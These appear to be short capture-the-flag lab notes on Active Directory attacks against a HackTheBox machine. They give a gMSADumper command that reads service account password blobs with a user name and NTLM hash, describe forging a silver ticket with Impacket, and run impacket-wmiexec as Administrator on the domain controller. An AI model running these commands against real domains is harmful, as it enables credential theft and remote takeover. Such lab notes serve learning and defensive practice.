Learnt About new Active directory misconfiguration: Reading gMSA password blobs using the following tool
python gMSADumper.py -u user -p e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c -d domain.local -l dc01.domain.local
Learnt about fixing Skewed clock, which is required to create silver ticket
In case of clock skew too great error, refer this blog
<https://medium.com/@danieldantebarnes/fixing-the-kerberos-sessionerror-krb-ap-err-skew-clock-skew-too-great-issue-while-kerberoasting-b60b0fe20069>
Learnt About creating Silver ticket using Impacket
Learnt about Injecting the silver ticket into env variable and using it to the machine
export KRB5CCNAME=Administrator.ccache
echo "10.10.10.248 dc.intelligence.htb" | sudo tee -a /etc/hosts
impacket-wmiexec -k -no-pass dc.intelligence.htb
-k Use Kerberos authentication. Grab credentials from ccache file (KRB5CCNAME) based on the target parameter